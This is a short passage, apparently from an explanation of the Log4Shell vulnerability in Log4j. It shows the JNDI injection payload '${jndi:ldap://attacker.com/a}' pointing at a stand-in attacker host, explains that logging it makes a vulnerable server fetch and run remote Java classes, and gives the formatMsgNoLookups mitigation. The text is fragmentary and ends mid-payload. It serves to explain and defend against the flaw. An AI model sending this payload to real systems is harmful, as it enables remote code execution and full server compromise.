${jndi:ldap://attacker.com/a}
into log messages. These messages, when logged, would cause the vulnerable server to fetch and execute remote Java classes from the attacker's server, leading to full compromise.
log4j2.formatMsgNoLookups=true
as a JVM option for legacy apps${jndi: